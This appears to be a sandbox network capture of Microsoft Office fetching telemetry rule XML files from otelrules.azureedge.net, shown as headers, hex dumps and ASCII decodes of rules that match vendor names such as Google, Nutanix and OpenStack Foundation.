                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 0514cbb3-901e-00ac-0281-3ab69e000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095421Z-185f5d8b95csp6jmhC1NYCwy6s00000009yg00000000d1dq
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      50192.168.2.64976013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                      x-ms-request-id: b82dc135-b01e-0053-1a8c-3acdf8000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095421Z-1777c6cb754rz2pghC1TEBghen00000009c0000000004meu
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      51192.168.2.64976113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 7511da03-801e-0083-3b8c-3af0ae000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095421Z-185f5d8b95ckwnflhC1NYCx9qs0000000a2000000000ct89
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      52192.168.2.64976213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                      x-ms-request-id: bdf96f18-c01e-0066-808c-3aa1ec000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095421Z-r1d97b99577hsvhhhC1TEByb1w000000032g00000000101f
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:21 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      53192.168.2.64976413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:22 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 2155a01d-401e-00a3-768c-3a8b09000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095422Z-185f5d8b95cx9g8lhC1NYCtgvc00000002d0000000008nzh
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      54192.168.2.64976313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:22 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095422Z-1777c6cb754rz2pghC1TEBghen000000099000000000bugp
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      55192.168.2.64976513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:22 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 5633ff77-c01e-0014-30eb-3aa6a3000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095422Z-r1d97b99577mrt4rhC1TEBftkc00000008fg00000000eed9
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      56192.168.2.64976613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:22 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 538c9d0d-101e-0028-1c8c-3a8f64000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095422Z-r1d97b99577lxltfhC1TEByw2s00000008ug000000001map
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      57192.168.2.64976713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:22 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 8e68b2a4-701e-005c-1a8c-3abb94000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095422Z-185f5d8b95c4bhwphC1NYCs8gw0000000a2000000000hbuk
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:22 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      58192.168.2.64976813.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
